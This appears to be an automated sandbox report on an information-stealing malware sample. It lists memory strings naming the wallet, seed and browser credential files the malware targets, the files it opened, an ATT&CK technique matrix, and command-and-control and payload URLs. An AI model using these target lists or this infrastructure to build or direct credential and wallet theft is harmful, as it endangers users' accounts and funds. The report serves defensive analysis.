                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
                          Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: .*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: Yara matchFile source: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

                          Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_6CA70C40 sqlite3_bind_zeroblob,4_2_6CA70C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_6CA70D60 sqlite3_bind_parameter_name,4_2_6CA70D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_6C998EA0 sqlite3_clear_bindings,4_2_6C998EA0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 124 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 161 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 511 Process Injection | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph] Behavior Graph ID: 1524997, Sample: file.exe, Startdate: 03/10/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe | 100% | Joe Sandbox ML | |
C:\ProgramData\CBFCFBFBFB.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://cowod.hoptoMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                        unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://s.ytimg.com;MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://steam.tv/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://playd.healthnlife.pk/ldms/a43486128347.exejMSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://t.me/ae5edfile.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.mozilla.com/en-US/blocklist/MSBuild.exe, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.drfalse
                                                                                                                                unknown
                                                                                                                                https://store.steMSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://mozilla.org0/MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                    unknown
                                                                                                                                    http://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lDBKKFC.4.drfalse
                                                                                                                                      unknown
                                                                                                                                      http://cowod.hoptoAAKJDAKMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://store.steampowered.com/points/shop/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HCAEHD.4.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://advocachark.store:443/apiMSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://www.ecosia.org/newtab/HCAEHD.4.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                            • URL Reputation: malware
                                                                                                                                            unknown
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDBKKFC.4.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://www.youtube.com/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.4.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://49.12.197.9ECAAFHMSBuild.exe, 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://steamcommunity.com/profiles/76561199780418869fMSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.google.com/recaptcha/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://checkout.steampowered.com/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgMSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://cowod.hopto.orgDAAEC--tent-Disposition:MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://store.steampowered.com/about/76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://advocachark.store/1$~MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
49.12.197.9 | unknown | Germany | 24940 | HETZNER-ASDE | true
